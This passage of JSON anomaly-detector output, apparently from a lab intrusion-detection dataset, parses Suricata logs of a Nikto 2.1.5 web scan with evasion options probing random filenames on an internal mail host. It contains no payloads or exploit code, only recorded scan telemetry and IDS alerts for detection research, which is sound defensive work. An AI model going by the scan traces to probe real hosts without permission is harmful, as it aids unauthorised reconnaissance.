"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.pw", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.329101+0000\",\"flow_id\":593912356536889,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46926,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pw\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pw\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.329101, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":593912356536889,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46926,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pw\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pw\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46926,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pw\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pw\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.pw\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.pw\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.pw", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.pw", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46926,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46926, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":593912356536889,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 593912356536889, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.329101+0000\",\"flow_id\":593912356536889,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46926,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pw\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pw\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.330544 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46928 -> 192.168.10.154:80", "/parser/model/time": 1583349514.330544, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46928, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.330544 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46928 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.cobalt", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.330734+0000\",\"flow_id\":246780214773980,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46928,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cobalt\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cobalt\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.330734, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":246780214773980,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46928,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cobalt\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cobalt\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46928,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cobalt\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cobalt\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.cobalt\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.cobalt\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.cobalt", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.cobalt", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46928,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46928, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":246780214773980,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 246780214773980, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.330734+0000\",\"flow_id\":246780214773980,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46928,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cobalt\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cobalt\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.332241 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46930 -> 192.168.10.154:80", "/parser/model/time": 1583349514.332241, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46930, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.332241 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46930 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.nsfdeslo", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.332343+0000\",\"flow_id\":66060875861775,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46930,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsfdeslo\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsfdeslo\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.332343, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":66060875861775,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46930,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsfdeslo\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsfdeslo\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46930,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsfdeslo\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsfdeslo\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.nsfdeslo\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.nsfdeslo\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.nsfdeslo", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.nsfdeslo", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46930,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46930, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":66060875861775,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 66060875861775, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.332343+0000\",\"flow_id\":66060875861775,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46930,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsfdeslo\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsfdeslo\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], 